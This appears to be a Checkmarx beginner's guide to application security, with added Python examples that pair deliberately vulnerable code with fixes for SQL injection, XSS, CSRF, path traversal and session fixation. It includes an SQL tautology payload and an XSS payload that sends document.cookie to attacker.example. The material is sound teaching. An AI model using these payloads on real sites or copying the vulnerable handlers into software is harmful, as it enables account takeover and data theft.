Application Security Guide for Beginners


Transcript of Application Security Guide for Beginners

Page 1: Application Security Guide for Beginners

Application Security Guide for Beginners.

Page 2: Application Security Guide for Beginners

INTRODUCTION

This beginner's guide to application security focuses on the main concepts and keywords used in the Application Security domain.

This guide is divided into the following categories:

Code Development Methodologies

Code

Application Security Solutions

Common Threats and Their Impacts

Page 3: Application Security Guide for Beginners

WHAT IS SDLC?

Most organizations develop applications according to a clear process by which each application is designed, developed, tested, and deployed. This sequence is called the software development lifecycle, or SDLC.

SDLC shapes the way applications are built and defines the processes and milestones an application needs to pass before going to the next stage of development.

WHAT IS A SECURE SDLC?

Secure SDLC is a process where security touch points are added to each stage of the SDLC. Secure SDLC applies security best practices to ensure that applications are secure upon release while fitting into any developer's continuous integration workflow.

SDLC Process, with the Secure SDLC activity added at each stage:

1. Requirements: Risk Assessment

2. Design: Threat Modeling & Design Review

3. Development: Static Analysis

4. Testing: Security Testing & Code Review

5. Deployment: Security Assessment & Secure Configuration

Page 4: Application Security Guide for Beginners

STATIC APPLICATION SECURITY TESTING WITH SECURE SDLC

Static Application Security Testing (SAST) is one of the driving forces behind the secure SDLC. SAST empowers developers to deliver secure applications by integrating with their development processes and environments (IDE, source repository, build server and bug tracker), so that findings reach the developer while the code is still being written.

In a secure SDLC, SAST solutions detect vulnerabilities which may expose the application to security risks and breaches.

[Figure: SAST Integration Points]

Page 5: Application Security Guide for Beginners

<CODE DEVELOPMENT METHODOLOGIES/>

Page 6: Application Security Guide for Beginners

Software Development Life Cycle (SDLC)

Process for planning, creating, testing and deploying an application.

Agile Model

Alternative to traditional project management where the emphasis is placed on empowering people to collaborate and make team decisions, in addition to continuous planning, testing and integration.

Page 7: Application Security Guide for Beginners

Waterfall Model

Sequential design process, used in software development, in which progress is seen as flowing steadily downwards (like a waterfall) through the phases of requirements, design, development and testing; each phase starts only when the previous one is complete.

Rapid Application Development (RAD)

Development method that uses minimal planning in favor of rapid prototyping. A prototype is equivalent to a component of the product.

Page 8: Application Security Guide for Beginners

<CODE/>

Page 9: Application Security Guide for Beginners

Codebase (or code base)

Collection of source code that is used to build a particular software system, application or software component.

Frameworks

Frameworks are fairly large pre-made pieces of code. The developers write their code on top of the framework, which means that a vulnerability in the framework is inherited by every application built on it, so frameworks need to be kept up to date like any other dependency.

Notable examples: Struts, Telerik, GWT

Page 10: Application Security Guide for Beginners

Build Systems (or Build Server, Build Automation)

A tool designed to automate the process of program compilation: compiling, linking, packaging and running tests. Build systems come in various forms and are used for a variety of software build tasks. A build server runs these builds automatically, for example on every commit, which makes it a natural place to run security scans as part of a secure SDLC.

Notable examples: Jenkins, AnthillPro

Source Code Repository

File archive or web hosting facility where large amounts of software source code are kept, either publicly or privately. The archived files are usually versioned, so every change is recorded together with who made it and when.

Notable examples: TFS, Git, Perforce, SVN

Page 11: Application Security Guide for Beginners

Bug Tracking Systems (Issue Tracking Systems)

Software application that keeps track of reported bugs, issues or tasks in a project. Security findings from scans and reviews are typically filed here so that they are fixed and tracked like any other defect.

Notable examples: TFS, Jira, HP-QC

Micro Services

Modern interpretation of service-oriented architectures used to build distributed software systems: processes that communicate with each other over the network in order to fulfill a task.

Example: microservices can be found at Facebook or LinkedIn; because each service is deployed independently, some parts of the GUI can be down for updates while others keep working.

Page 12: Application Security Guide for Beginners

DLL (Dynamic Link Library)

The artifact created after compiling and building source code on Windows (C, C++, .NET and other languages): a shared library that executables load at run time.

JAR (Java Archive)

The artifact created after compiling and building Java source code: a ZIP archive of compiled classes and resources that the Java runtime can load.

Page 13: Application Security Guide for Beginners

Test Driven Development (TDD)

Development is built around predefined test cases. This means that only after the test cases have been written can the developers start writing the code, and the code is complete when the tests pass. Security requirements can be expressed as test cases in the same way.

Page 14: Application Security Guide for Beginners

<APPLICATION SECURITY SOLUTIONS/>

Page 15: Application Security Guide for Beginners

Static Application Security Testing (SAST)

Security testing which analyzes an application's source code or binary code to determine whether security vulnerabilities exist.

SAST solutions analyze the application 'from the inside out'. Many SAST solutions work directly on source code and do not need compiled code; others analyze the compiled output instead (see Binary Analysis).

Penetration Testing (AKA Pen Testing)

Security experts try to find and exploit vulnerabilities that an attacker could use. The testing is done with or without dedicated hacking tools.

Page 16: Application Security Guide for Beginners

Dynamic Application Security Testing (DAST)

Detects conditions of a security vulnerability in an application in its running state. DAST sends automated attacks of the kind a real attacker would use against the running application and observes its responses, analyzing it 'from the outside in'.

Runtime Application Self-Protection (RASP)

Security technology that is built or linked into an application or application runtime environment and is capable of detecting and preventing attacks in real time.

Page 17: Application Security Guide for Beginners

Common Weakness Enumeration (CWE)

A community-developed list of software weaknesses. Software weaknesses are errors that can lead to software vulnerabilities; each entry has an identifier (for example, CWE-89 for SQL Injection) that scanners use to classify their findings.

Common Vulnerabilities and Exposures (CVE)

A publicly available and free-to-use list or dictionary of standardized identifiers for common computer vulnerabilities and exposures. Where CWE names a kind of weakness, a CVE names one specific vulnerability in one specific product.

Page 18: Application Security Guide for Beginners

Open Web Application Security Project (OWASP)

Community which creates freely available methodologies, tools, standards and technologies in the field of application security.

Interactive Application Security Testing (IAST)

Combines elements of SAST and DAST simultaneously. It is typically implemented as an agent within the test runtime application or environment that observes attacks and identifies vulnerabilities.

IAST determines whether a vulnerability is exploitable with increased accuracy, and can identify where specifically the vulnerability is located in the code.

Page 19: Application Security Guide for Beginners

False Positive

When a security scanner indicates that a vulnerability exists (for example, SQL Injection), while in reality it does not.

False Negative

When a vulnerability exists and the security scanner does not detect it. The user is therefore not notified about the vulnerability.

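What a static analyzer actually does, and why the false positive and false negative entries above matter, is easiest to see on a single small rule. The following Python program is an added example written for this guide, not a Checkmarx product and not code from the original slides: it parses source with the standard ast module, flags execute() calls whose SQL text is assembled with + or %, and compares its findings against a hand-labelled ground truth. The source it scans is constructed for the demonstration, and scan, triage and gate_exit_code are the example's own names.

```python
import ast

# Constructed sample source to scan (not code from the original page).
# Ground truth: lines 3, 9 and 12 are injectable; line 16 concatenates a constant.
SAMPLE_SOURCE = '''
def lookup(cursor, username):
    cursor.execute("SELECT * FROM users WHERE name = '" + username + "'")

def lookup_safe(cursor, username):
    cursor.execute("SELECT * FROM users WHERE name = ?", (username,))

def lookup_fmt(cursor, username):
    cursor.execute("SELECT * FROM users WHERE name = %s" % username)

def lookup_fstr(cursor, username):
    cursor.execute(f"SELECT * FROM users WHERE name = '{username}'")

def table_count(cursor):
    table = "users"
    cursor.execute("SELECT count(*) FROM " + table)
'''

TRULY_VULNERABLE = {3, 9, 12}   # what a human reviewer would mark in the sample above


class SqlStringBuildFinder(ast.NodeVisitor):
    """Rule: flag any .execute(...) whose first argument is built with + or %.
    It is purely syntactic: it does not know whether the pieces are user input."""

    def __init__(self):
        self.findings = []

    def visit_Call(self, node):
        func = node.func
        if isinstance(func, ast.Attribute) and func.attr == "execute" and node.args:
            query = node.args[0]
            if isinstance(query, ast.BinOp) and isinstance(query.op, (ast.Add, ast.Mod)):
                self.findings.append((node.lineno, "CWE-89: SQL text assembled with + or %"))
        self.generic_visit(node)


def scan(source):
    """Parse the source and return (line, message) findings ordered by line."""
    finder = SqlStringBuildFinder()
    finder.visit(ast.parse(source))
    return sorted(finder.findings)


def triage(findings, truth):
    """Compare scanner output with ground truth to expose false positives/negatives."""
    reported = {line for line, _ in findings}
    return {
        "true_positives": sorted(reported & truth),
        "false_positives": sorted(reported - truth),   # line 16: only a constant is concatenated
        "false_negatives": sorted(truth - reported),   # line 12: an f-string is a JoinedStr, not a BinOp
    }


def gate_exit_code(findings):
    """How a build step would consume the result: a non-zero code fails the pipeline."""
    return 1 if findings else 0


if __name__ == "__main__":
    found = scan(SAMPLE_SOURCE)
    for line, msg in found:
        print("line %d: %s" % (line, msg))
    print(triage(found, TRULY_VULNERABLE))
    raise SystemExit(gate_exit_code(found))
```

The rule is purely syntactic, which is exactly how the two error types arise: it reports line 16, where only a constant table name is concatenated (a false positive), and misses line 12, where the f-string is a different AST node (a false negative). Real SAST engines add data-flow analysis so that only values reaching the query from untrusted sources are reported, which lowers both rates; the gate_exit_code value is how a build step in a secure SDLC would stop the pipeline on findings.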

Page 20: Application Security Guide for Beginners

Web Application Firewall (WAF)

Protects web applications by monitoring and controlling their input and output and the access to and from the application.

Running as an appliance, server plug-in or cloud-based service, a WAF inspects, monitors, filters or blocks malicious traffic to and from a web application. It is a compensating control in front of the application, not a fix for the vulnerability itself.

Binary Analysis

Binary Analysis is a form of Static Application Security Testing based on analysis of a compiled code base rather than the raw source code. A binary is a machine-readable file which can be executed and run.

Page 21: Application Security Guide for Beginners

Bug Bounty Program

Agreement offered by many websites and software development companies by which individuals can receive recognition and compensation for reporting bugs, exploits and vulnerabilities.

Security Gate

A checkpoint in the SDLC that code must pass before it moves to the next stage: after the code is written it is sent to a security expert (or an automated scan) for inspection, and the developer must alter the code to fix the reported findings before it can proceed.

Page 22: Application Security Guide for Beginners

<COMMON THREATS AND THEIR IMPACTS/>

Six common web application threats

Page 23: Application Security Guide for Beginners

SQL Injection

THREAT: Code injection technique used to attack data-driven applications, in which malicious SQL fragments are inserted into an entry field so that they are executed as part of the application's query.

IMPACT:

May read, insert or damage data

May be used to reveal customers' credit card numbers or any other personal data stored in the DB

Depending on the database privileges of the application's account, the attacker may be able to change system administrator credentials for the database server

Can affect the public image of the company, resulting in lost profit

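The threat above, shown end to end in Python with the standard-library sqlite3 module. This is an added example, not code from the original guide; the in-memory database and its two rows are constructed for the demonstration, and the function names are the example's own.

```python
import sqlite3

# Constructed sample data for the demonstration (not real card numbers).
SAMPLE_USERS = [("alice", "4111111111111111"), ("bob", "5500000000000004")]


def make_db():
    """In-memory database with a users table holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, card TEXT)")
    conn.executemany("INSERT INTO users (name, card) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn, name):
    """Injectable: the input is pasted into the SQL text and can change the query's meaning."""
    query = "SELECT name, card FROM users WHERE name = '" + name + "'"
    return sorted(conn.execute(query).fetchall())


def find_user_safe(conn, name):
    """Fixed: the value is bound as a parameter; the database never parses it as SQL."""
    rows = conn.execute("SELECT name, card FROM users WHERE name = ?", (name,)).fetchall()
    return sorted(rows)


# Classic tautology payload: closes the string literal, then adds an always-true condition.
PAYLOAD = "x' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_user_vulnerable(db, PAYLOAD))   # both rows, card numbers included
    print("safe:", find_user_safe(db, PAYLOAD))               # [] : no user has that literal name
    print("safe, real user:", find_user_safe(db, "alice"))
```

With the payload, the vulnerable query becomes WHERE name = 'x' OR '1'='1', which is true for every row, so both customers' card numbers come back. The parameterized version binds the payload as a value, so it searches for a user literally named x' OR '1'='1 and returns nothing. Parameterized queries (prepared statements) are the fix; escaping quotes by hand is not, because the rules differ per database dialect and are easy to get wrong.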

Page 24: Application Security Guide for Beginners

Cross Site Scripting (XSS)

THREAT: Vulnerability typically found in web applications enabling attackers to inject client-side scripts into web pages viewed by other users.

IMPACT:

May gain access to the user's identity and act on their behalf

Ability to spread web worms or Trojans

Possible business impact of public exposure of the vulnerability

Attacker may gain access to the end-user information kept in the browser (cookies, session ID and client identity); a cookie marked HttpOnly cannot be read by the injected script, but the script can still send requests that carry it

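Reflected XSS and its fix, as an added Python example that is not code from the original guide. The attacker payload and the hostname in it are constructed for the demonstration. The example goes one step beyond the slide: it shows that output encoding is context-dependent, because a javascript: URL placed in an href attribute survives HTML encoding unchanged and still executes when clicked, so attribute values that hold URLs also need a scheme check.

```python
import html

# Constructed attacker input (hypothetical hostname): ships the victim's cookies
# to a host the attacker controls if it ever runs in the victim's browser.
PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"


def render_greeting_vulnerable(name):
    """Reflected XSS: untrusted input is concatenated straight into the HTML."""
    return "<p>Hello, " + name + "!</p>"


def render_greeting_safe(name):
    """Fix for the element-content context: encode the HTML metacharacters
    (<, >, &, ", ') so the browser shows them as text instead of parsing them."""
    return "<p>Hello, " + html.escape(name, quote=True) + "!</p>"


def render_link_safe(url, label):
    """Attribute context: html.escape leaves 'javascript:alert(1)' untouched, and the
    browser would still run it on click, so only http(s) URLs are accepted."""
    if not url.strip().lower().startswith(("http://", "https://")):
        url = "#"
    return '<a href="%s">%s</a>' % (html.escape(url, quote=True), html.escape(label, quote=True))
```

Encoding is applied at the moment of output, for the context the value lands in; templating engines that escape by default do this for the HTML text context, but URL attributes, JavaScript blocks and CSS each need their own rules.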

Page 25: Application Security Guide for Beginners

Clickjacking (UI redress attack)

THREAT: Attacker uses multiple transparent layers to trick a user into clicking on a button or link that is not the originally intended target area. The visible page belongs to the attacker; the invisible layer on top is a page from another application where the user is logged in, so the click is hijacked and lands on that page's controls. Keystrokes can be hijacked using the same method.

IMPACT:

Can be used to make the user grant access to the computer's microphone and camera

Can be used to trigger any single-click action on the hidden page, such as a "like", a follow, a purchase or a settings change, and to capture sensitive information typed into hijacked fields

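The defence against clickjacking is to tell the browser which sites, if any, may frame the page, using the Content-Security-Policy frame-ancestors directive and the older X-Frame-Options header. The following Python function is an added example, not code from the original guide or from any browser: it approximates the decision a browser makes from those headers so that a server's configuration can be checked in a test. It handles the 'none', 'self' and full-origin forms of frame-ancestors; the host-only and wildcard forms of the CSP syntax are out of scope here (an assumption stated in the docstring).

```python
from urllib.parse import urlsplit


def origin_of(url):
    """scheme://host[:port], lower-cased, which is how browsers compare origins."""
    parts = urlsplit(url)
    return ("%s://%s" % (parts.scheme, parts.netloc)).lower()


def framing_allowed(headers, page_url, top_url):
    """Approximate the browser's decision: may the page at page_url be placed in a
    frame by the top-level document at top_url?  CSP frame-ancestors takes precedence
    over X-Frame-Options; with neither header, any site may frame the page.
    Assumption: only 'none', 'self' and full origins are supported as sources."""
    page_origin, top_origin = origin_of(page_url), origin_of(top_url)

    csp = headers.get("Content-Security-Policy", "")
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            allowed = set()
            for src in tokens[1:]:
                src = src.strip("'").lower()
                if src == "self":
                    allowed.add(page_origin)
                elif src != "none":
                    allowed.add(src)
            return top_origin in allowed

    xfo = headers.get("X-Frame-Options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return page_origin == top_origin
    return True   # no protection: an attacker's page can overlay this one


# Headers a server should send on pages that must never be framed. Both are sent
# because older browsers only understand X-Frame-Options and newer ones prefer CSP.
ANTI_CLICKJACKING_HEADERS = {
    "Content-Security-Policy": "frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
}
```

A page that legitimately embeds a widget from a partner site lists that partner's origin in frame-ancestors; everything else stays denied. Note that frame-ancestors is only honoured in the header, not in a meta tag.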

Page 26: Application Security Guide for Beginners

Cross Site Request Forgery (CSRF)

THREAT: Attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. Because the browser attaches the victim's cookies to the forged request, it inherits the identity and privileges of the victim and performs an undesired function on the victim's behalf.

IMPACT:

Can force the victim to perform state-changing requests such as transferring funds, changing their email address, and so forth

If the victim is an administrative account, can compromise the entire web application

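The standard fix is the synchronizer token pattern: every state-changing form carries a secret, per-session token that a page on the attacker's origin cannot read, and the server refuses requests that do not present it. The following Python example is added here and is not code from the original guide; the session class, the transfer handler and the balance values are constructed for the demonstration.

```python
import hmac
import secrets


class Session:
    """Server-side session; the CSRF token is generated once per session."""

    def __init__(self, user):
        self.user = user
        self.csrf_token = secrets.token_urlsafe(32)


def render_transfer_form(session):
    """The token is embedded in the legitimate page, which only the same origin can read."""
    return ('<form method="POST" action="/transfer">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<input name="to"><input name="amount"><button>Send</button></form>') % session.csrf_token


def handle_transfer_vulnerable(session, form, balance):
    """Trusts the session cookie alone: a form auto-submitted from the attacker's site
    arrives with the victim's cookie, so the attacker's transfer goes through."""
    amount = int(form["amount"])
    return balance - amount, "sent %d to %s" % (amount, form["to"])


def handle_transfer_safe(session, form, balance):
    """Synchronizer token check before any state change; compare_digest keeps the
    comparison time independent of how many leading characters matched."""
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, session.csrf_token):
        return balance, "rejected: missing or invalid CSRF token"
    return handle_transfer_vulnerable(session, form, balance)
```

Marking the session cookie SameSite=Lax or Strict is a second, independent layer: the browser then does not attach the cookie to cross-site POST requests at all. The token check remains the primary defence because it does not depend on every client honouring the attribute.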

Page 27: Application Security Guide for Beginners

Path Traversal (Directory Traversal, dot-dot-slash)

THREAT: Vulnerability which allows attackers to access files and directories outside the web server's intended directory (the web root), typically by placing "../" sequences in a file name parameter that the application joins onto a path.

IMPACT:

Can be used to read restricted files such as application source code, configuration files holding credentials, or operating-system files, causing a critical information leak

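A vulnerable file handler next to its fix, as an added Python example that is not code from the original guide. The directory layout is constructed in a temporary directory for the demonstration; resolve_inside, is_blocked and the serve_* functions are the example's own names.

```python
import os
import tempfile


def resolve_inside(base_dir, requested):
    """Resolve requested against base_dir and refuse anything that escapes it:
    ../ sequences, absolute paths, and symlinks that point outside."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path traversal blocked: %r" % requested)
    return target


def make_sample_tree():
    """Constructed sample layout: public/ is the web root, secret.txt sits one level above it."""
    root = tempfile.mkdtemp()
    public = os.path.join(root, "public")
    os.mkdir(public)
    with open(os.path.join(public, "index.html"), "w") as f:
        f.write("<h1>ok</h1>")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("db_password=hunter2")
    return public


def serve_vulnerable(public, requested):
    """Joins the user-supplied name straight onto the web root."""
    with open(os.path.join(public, requested)) as f:
        return f.read()


def serve_safe(public, requested):
    """Same handler behind the containment check."""
    with open(resolve_inside(public, requested)) as f:
        return f.read()


def is_blocked(public, requested):
    """True when resolve_inside refuses the name (convenience for demonstrating the check)."""
    try:
        resolve_inside(public, requested)
        return False
    except PermissionError:
        return True
```

The check resolves both paths with realpath first, so it also catches symlinks that lead outside the web root and absolute paths (os.path.join discards the base when its second argument is absolute). Comparing with commonpath rather than startswith avoids the classic mistake where /srv/www-secret passes a prefix check for /srv/www. URL-decoding happens before this point in a real server, so encoded forms such as %2e%2e%2f arrive here as plain "../".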

Page 28: Application Security Guide for Beginners

Session Fixation

THREAT: Vulnerability that permits an attacker to hijack a valid user session. The attack exploits a limitation in the way the web application manages the session ID: the attacker obtains a session ID, plants it in the victim's browser (for example, through a link that carries it), and the vulnerable application keeps using that same ID after the victim logs in.

IMPACT:

Can be used to hijack the user's authenticated session, since the attacker already knows the session ID

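Session fixation succeeds only if the identifier the attacker planted is still valid after the victim authenticates, so the fix is to issue a fresh identifier at every privilege change. The following Python session store is an added example, not code from the original guide; the in-memory store and the attacker/victim flow in fixation_attack are constructed for the demonstration.

```python
import secrets


class SessionStore:
    """In-memory session store keyed by session id (constructed for the demo)."""

    def __init__(self):
        self.sessions = {}

    def new_session(self):
        """Anonymous pre-login session; the attacker can obtain one and pass its id to the victim."""
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def login_vulnerable(self, sid, user):
        """Keeps whatever id arrived with the login request: the attacker's id now
        belongs to the victim's authenticated session."""
        self.sessions.setdefault(sid, {"user": None})["user"] = user
        return sid

    def login_fixed(self, sid, user):
        """Rotates the id on authentication and invalidates the pre-login id server-side."""
        self.sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self.sessions[new_sid] = {"user": user}
        return new_sid

    def whoami(self, sid):
        """Whom the server believes to be behind this session id, or None."""
        return self.sessions.get(sid, {}).get("user")


def fixation_attack(store, login):
    """Runs the attack against either login implementation and returns what the
    attacker's planted id yields afterwards:
    1. attacker obtains a session id and plants it in the victim's browser
    2. victim logs in while carrying that id
    3. attacker presents the same id"""
    planted = store.new_session()
    login(planted, "victim")
    return store.whoami(planted)
```

Rotation on login is the core of the fix; the same rule applies to any step-up in privilege (password change, role change). Accepting session IDs only from cookies, never from URL parameters, removes the easiest way of planting one.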

Page 29: Application Security Guide for Beginners

Thanks for reading! Learn more at: www.checkmarx.com